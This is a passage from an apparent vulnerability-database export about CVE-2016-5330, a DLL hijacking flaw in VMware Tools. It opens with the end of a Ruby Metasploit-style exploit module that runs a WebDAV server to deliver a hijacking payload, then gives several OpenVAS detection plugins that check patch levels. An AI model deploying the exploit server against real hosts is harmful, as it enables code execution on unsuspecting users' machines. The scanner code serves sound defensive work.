UNLOCK',\r\n 'Cache-Control' => 'private'\r\n }\r\n resp = create_response(207, \"Multi-Status\")\r\n headers.each_pair {|k,v| resp[k] = v }\r\n resp.body = \"\"\r\n resp['Content-Type'] = 'text/xml'\r\n cli.send_response(resp)\r\n end\r\n \r\n #\r\n # PROPFIND requests sent by the WebDav Mini-Redirector\r\n #\r\n def process_propfind(cli, request)\r\n path = request.uri\r\n print_status(\"PROPFIND #{path}\")\r\n body = ''\r\n \r\n my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n my_uri = \"http://#{my_host}/\"\r\n \r\n if path !~ /\\/$/\r\n \r\n if blacklisted_path?(path)\r\n print_status \"PROPFIND => 404 (#{path})\"\r\n resp = create_response(404, \"Not Found\")\r\n resp.body = \"\"\r\n cli.send_response(resp)\r\n return\r\n end\r\n \r\n if path.index(\".\")\r\n print_status \"PROPFIND => 207 File (#{path})\"\r\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n</D:multistatus>\r\n|\r\n # send the response\r\n resp = create_response(207, \"Multi-Status\")\r\n resp.body = body\r\n resp['Content-Type'] = 'text/xml; charset=\"utf8\"'\r\n cli.send_response(resp)\r\n return\r\n else\r\n print_status \"PROPFIND => 301 (#{path})\"\r\n resp = create_response(301, \"Moved\")\r\n resp[\"Location\"] = path + \"/\"\r\n resp['Content-Type'] = 'text/html'\r\n cli.send_response(resp)\r\n return\r\n end\r\n end\r\n \r\n print_status \"PROPFIND => 207 Directory (#{path})\"\r\n body = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<D:multistatus xmlns:D=\"DAV:\" xmlns:b=\"urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/\">\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n \r\n if request[\"Depth\"].to_i > 0\r\n trail = path.split(\"/\")\r\n trail.shift\r\n case trail.length\r\n when 0\r\n body << generate_shares(path)\r\n when 1\r\n body << generate_files(path)\r\n end\r\n else\r\n print_status \"PROPFIND => 207 Top-Level Directory\"\r\n end\r\n \r\n body << \"</D:multistatus>\"\r\n \r\n body.gsub!(/\\t/, '')\r\n \r\n # send the response\r\n resp = create_response(207, \"Multi-Status\")\r\n resp.body = body\r\n resp['Content-Type'] = 'text/xml; charset=\"utf8\"'\r\n cli.send_response(resp)\r\n end\r\n \r\n def generate_shares(path)\r\n share_name = datastore['SHARENAME']\r\n%Q|\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{share_name}/</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype><D:collection/></lp1:resourcetype>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>httpd/unix-directory</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n end\r\n \r\n def generate_files(path)\r\n trail = path.split(\"/\")\r\n return \"\" if trail.length < 2\r\n \r\n %Q|\r\n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\">\r\n<D:href>#{path}#{datastore['BASENAME']}.docx</D:href>\r\n<D:propstat>\r\n<D:prop>\r\n<lp1:resourcetype/>\r\n<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>\r\n<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>\r\n<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>\r\n<lp1:getetag>\"#{\"%.16x\" % rand(0x100000000)}\"</lp1:getetag>\r\n<lp2:executable>T</lp2:executable>\r\n<D:supportedlock>\r\n<D:lockentry>\r\n<D:lockscope><D:exclusive/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n<D:lockentry>\r\n<D:lockscope><D:shared/></D:lockscope>\r\n<D:locktype><D:write/></D:locktype>\r\n</D:lockentry>\r\n</D:supportedlock>\r\n<D:lockdiscovery/>\r\n<D:getcontenttype>application/octet-stream</D:getcontenttype>\r\n</D:prop>\r\n<D:status>HTTP/1.1 200 OK</D:status>\r\n</D:propstat>\r\n</D:response>\r\n|\r\n end\r\n \r\n def gen_timestamp(ttype=nil)\r\n ::Time.now.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\r\n end\r\n \r\n def gen_datestamp(ttype=nil)\r\n ::Time.now.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\r\n end\r\n \r\n # This method rejects requests that are known to break exploitation\r\n def blacklisted_path?(uri)\r\n return true if uri =~ /\\.exe/i\r\n return true if uri =~ /\\.(config|manifest)/i\r\n return true if uri =~ /desktop\\.ini/i\r\n return true if uri =~ /lib.*\\.dll/i\r\n return true if uri =~ /\\.tmp$/i\r\n return true if uri =~ /(pcap|packet)\\.dll/i\r\n false\r\n end\r\n \r\n def exploit\r\n \r\n myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']\r\n \r\n @exploit_unc = \"\\\\\\\\#{myhost}\\\\\"\r\n \r\n if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\r\n fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')\r\n end\r\n \r\n print_status(\"Files are available at #{@exploit_unc}#{datastore['SHARENAME']}\")\r\n \r\n super\r\n end\r\nend\n\n# 0day.today [2018-01-06] #", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/27418"}], "openvas": [{"lastseen": "2019-12-19T16:04:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "description": "A DLL hijacking vulnerability is present in the VMware Tools ", "modified": "2019-12-18T00:00:00", "published": "2016-08-05T00:00:00", "id": "OPENVAS:1361412562310105851", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105851", "type": "openvas", "title": "VMware ESXi updates address multiple important security issues (VMSA-2016-0010)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2016-0010 (CVE-2016-5330) ESXi: VMware product updates address multiple important security issues\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105851\");\n script_cve_id(\"CVE-2016-5330\");\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"2019-12-18T11:13:08+0000\");\n script_name(\"VMware ESXi updates address multiple important security issues (VMSA-2016-0010)\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the target host is missing one or more patch(es).\");\n\n script_tag(name:\"solution\", value:\"Apply the missing patch(es).\");\n\n script_tag(name:\"summary\", value:\"A DLL hijacking vulnerability is present in the VMware Tools 'Shared Folders' (HGFS)\n feature running on Microsoft Windows.\");\n\n script_tag(name:\"impact\", value:\"Exploitation of this issue may lead to arbitrary code execution with the privileges\n of the victim. In order to exploit this issue, the attacker would need write access to a network share and they\n would need to entice the local user into opening their document.\n\n Successfully exploiting this issue requires installation of 'Shared Folders' component (HGFS feature) which does not\n get installed in 'custom/typical' installation of VMware Tools on Windows VM running on ESXi.\");\n\n script_tag(name:\"affected\", value:\"ESXi 6.0 without patch ESXi600-201603102-SG\n\n ESXi 5.5 without patch ESXi550-201607102-SG\n\n ESXi 5.1 without patch ESXi510-201605102-SG\n\n ESXi 5.0 without patch ESXi500-201606102-SG\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-18 11:13:08 +0000 (Wed, 18 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-08-05 16:10:53 +0200 (Fri, 05 Aug 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\", \"VMware/ESX/version\");\n\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"VMware/ESXi/LSC\"))\n exit(0);\n\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))\n exit(0);\n\npatches = make_array(\"6.0.0\", \"VIB:tools-light:6.0.0-1.31.3568943\",\n \"5.5.0\", \"VIB:tools-light:5.5.0-3.86.4179631\",\n \"5.1.0\", \"VIB:tools-light:5.1.0-3.82.3872638\",\n \"5.0.0\", \"VIB:tools-light:5.0.0-3.87.3982819\");\n\nif(!patches[esxVersion])\n exit(99);\n\nif(report = esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "description": "The host is installed with\n VMware Tools and is prone to a privilege escalation vulnerability.", "modified": "2018-10-17T00:00:00", "published": "2016-09-01T00:00:00", "id": "OPENVAS:1361412562310809031", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809031", "type": "openvas", "title": "VMware Tools 'HGFS Feature' Privilege Escalation Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_tools_hgfs_feature_privilege_escalation_vuln.nasl 11938 2018-10-17 10:08:39Z asteins $\n#\n# VMware Tools 'HGFS Feature' Privilege Escalation Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:tools\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809031\");\n script_version(\"$Revision: 11938 $\");\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-17 12:08:39 +0200 (Wed, 17 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"VMware Tools 'HGFS Feature' Privilege Escalation Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is installed with\n VMware Tools and is prone to a privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a DLL hijacking\n vulnerability present in the VMware Tools 'Shared Folders' (HGFS) feature\n running on Microsoft Windows.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n local users to gain extra privileges.\");\n\n script_tag(name:\"affected\", value:\"VMware Tools 10.0.5.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Tools 10.0.6\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_tools_detect_win.nasl\");\n script_mandatory_keys(\"VMwareTools/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmtoolVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_equal(version:vmtoolVer, test_version:\"10.0.5\"))\n{\n report = report_fixed_ver(installed_version:vmtoolVer, fixed_version:\"10.0.6\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "description": "The host is installed with\n VMware Workstation Player and is prone to an important guest privilege\n escalation vulnerability.", "modified": "2018-10-24T00:00:00", "published": "2016-09-01T00:00:00", "id": "OPENVAS:1361412562310809023", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809023", "type": "openvas", "title": "VMware Workstation Player 'HGFS' Feature Privilege Escalation Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_workstation_player_hgfs_privilege_escalation_vuln_lin.nasl 12051 2018-10-24 09:14:54Z asteins $\n#\n# VMware Workstation Player 'HGFS' Feature Privilege Escalation Vulnerability (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809023\");\n script_version(\"$Revision: 12051 $\");\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-24 11:14:54 +0200 (Wed, 24 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"VMware Workstation Player 'HGFS' Feature Privilege Escalation Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with\n VMware Workstation Player and is prone to an important guest privilege\n escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a DLL hijacking\n vulnerability present in the VMware Tools 'Shared Folders' (HGFS) feature\n running on Microsoft Windows.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n local users to gain extra privileges.\");\n\n script_tag(name:\"affected\", value:\"VMware Workstation Player 12.1.x before\n 12.1.1 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Workstation Player\n version 12.1.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"VMware/Linux/Installed\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^(12\\.1)\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"12.1.1\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"12.1.1\");\n security_message(data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "description": "The host is installed with VMware Workstation\n and is prone to a privilege escalation vulnerability.", "modified": "2018-10-16T00:00:00", "published": "2016-09-01T00:00:00", "id": "OPENVAS:1361412562310809021", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809021", "type": "openvas", "title": "VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_workstation_hgfs_privilege_escalation_vuln_win.nasl 11922 2018-10-16 10:24:25Z asteins $\n#\n# VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:workstation\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809021\");\n script_version(\"$Revision: 11922 $\");\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-16 12:24:25 +0200 (Tue, 16 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"VMware Workstation 'HGFS' Feature Privilege Escalation Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMware Workstation\n and is prone to a privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a DLL hijacking\n vulnerability present in the VMware Tools 'Shared Folders' (HGFS) feature\n running on Microsoft Windows.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n local users to gain extra privileges.\");\n\n script_tag(name:\"affected\", value:\"VMware Workstation version 12.1.x before\n 12.1.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Workstation version\n 12.1.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_win.nasl\");\n script_mandatory_keys(\"VMware/Win/Installed\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^(12\\.1)\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"12.1.1\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"12.1.1\");\n security_message(data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "description": "The host is installed with VMware Fusion\n and is prone to a privilege escalation vulnerability.", "modified": "2018-10-15T00:00:00", "published": "2016-09-01T00:00:00", "id": "OPENVAS:1361412562310809020", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809020", "type": "openvas", "title": "VMware Fusion 'HGFS' Feature Privilege Escalation Vulnerability (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_fusion_hgfs_privilege_escalation_vuln_macosx.nasl 11903 2018-10-15 10:26:16Z asteins $\n#\n# VMware Fusion 'HGFS' Feature Privilege Escalation Vulnerability (Mac OS X)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:fusion\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809020\");\n script_version(\"$Revision: 11903 $\");\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-15 12:26:16 +0200 (Mon, 15 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)\");\n script_name(\"VMware Fusion 'HGFS' Feature Privilege Escalation Vulnerability (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMware Fusion\n and is prone to a privilege escalation vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a DLL hijacking\n vulnerability present in the VMware Tools 'Shared Folders' (HGFS) feature\n running on Microsoft Windows.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n local users to gain extra privileges.\");\n\n script_tag(name:\"affected\", value:\"VMware Fusion 8.1.x before 8.1.1 on\n Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Fusion version\n 8.1.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0010.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"secpod_vmware_fusion_detect_macosx.nasl\");\n script_mandatory_keys(\"VMware/Fusion/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^(8\\.1)\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"8.1.1\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"8.1.1\");\n security_message(data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5330"], "description": "The host is installed with\n VMware Workstation Player and is prone to an important guest privilege\n escalation vulnerability.", "modified": "2018-10-24T00:00:00", "published": "2016-09-01T00:00:00", "id": "OPENVAS:1361412562310809024", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809024", "type": "openvas", "title": "VMware Workstation Player 'HGFS' Feature Privilege Escalation Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_workstation_player_hgfs_privilege_escalation_vuln_win.nasl 12051 2018-10-24 09:14:54Z asteins $\n#\n# VMware Workstation Player 'HGFS' Feature Privilege Escalation Vulnerability (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809024\");\n script_version(\"$Revision: 12051 $\");\n script_cve_id(\"CVE-2016-5330\");\n script_bugtraq_id(92323);\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-24 11:14:54 +0200 (Wed, 24 Oct 2018) $\");\n 